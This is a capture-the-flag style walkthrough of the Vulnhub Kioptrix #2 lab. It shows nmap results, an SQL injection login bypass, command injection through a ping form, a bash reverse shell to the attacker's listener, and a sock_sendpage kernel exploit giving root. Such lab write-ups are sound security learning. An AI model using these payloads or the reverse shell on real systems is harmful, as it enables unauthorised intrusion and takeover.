Vulnhub - Kioptrix #2 Writeup

3 minute read

Vulnhub - Kioptrix #2

Enumeration

Nmap

Nmap scan report for 192.168.71.129
Host is up, received arp-response (0.0056s latency).
Scanned at 2020-01-19 12:22:25 IST for 119s
Not shown: 994 closed ports
Reason: 994 resets
PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|   1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/  
j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=
|_sshv1: Server supports SSHv1
80/tcp   open  http       syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    syn-ack ttl 64 2 (RPC #100000)
443/tcp  open  ssl/https? syn-ack ttl 64
|_ssl-date: 2020-01-19T04:44:13+00:00; -2h09m12s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
631/tcp  open  ipp        syn-ack ttl 64 CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:48:8C:63 (VMware)

Host script results:
|_clock-skew: -2h09m12s

That’s a lot of attack surface to cover. Let’s start with the web application on port 80.

image1 Looks like a login page for administrators. We can try sql injection or sql login bypass.
We can bypass the login using ' or 1# or ' or 1--

MySQL Login code (an be found after getting a shell)

$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";

We can see that we can escape from the query using a ' and then return a true value using or 1 and then comment out the rest using # or --

Low Privilege Shell

Login has been successfully bypassed and we are presented with another page, asking for an ip address to ping. image1 We can inject any command here by appending a ; followed by our code. Unfortunately there was no netcat installed. But we can get reverse shell using bash

bash -i >& /dev/tcp/192.168.71.128/4444 0>&1

Don’t forget to start a nc listener.

root@kali:~/Desktop/vulnhub/kioptix2# nc -lvp 4444
listening on [any] 4444 ...
192.168.71.129: inverse host lookup failed: Unknown host
connect to [192.168.71.128] from (UNKNOWN) [192.168.71.129] 49917
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

And we have a shell.

Low Priv Shell Enumeration

So I spent a good amount of time snooping around, looking for privilege escalation methods but to no avail. I finally started looking for kernel exploits. Usually it’s always a good practice to avoid kernel exploitation as this opens up many dangers such as crashing or corrupting the machine. So always make sure that you have exhausted all your options before trying out kernel exploits.

Linux Exploit Suggester

We can use Linux_Exploit_Suggester.pl to find possible kernel exploits.

bash-3.00$ perl Linux_Exploit_Suggester.pl

Kernel local: 2.6.9

Searching among 65 exploits...

Possible Exploits:
[+] american-sign-language
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408/
[+] exp.sh
[+] half_nelson
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/6851
[+] half_nelson1
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
   Alt: econet    CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson3
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787/
[+] krad
[+] krad3
   Source: http://exploit-db.com/exploits/1397
[+] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150/
[+] py2
[+] sock_sendpage
   Alt: wunderbar_emporium    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9435
[+] sock_sendpage2
   Alt: proto_ops    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
[+] udp_sendmsg_32bit
   CVE-2009-2698
   Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[+] video4linux
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024/

I had to filter through these exploits and finally found sock_sendpage()

Root Shell

Transfer the code to the machine(I used python http server and wget), compile it and run.

bash-3.00$ gcc -Wall sock.c
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

And we are root!

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.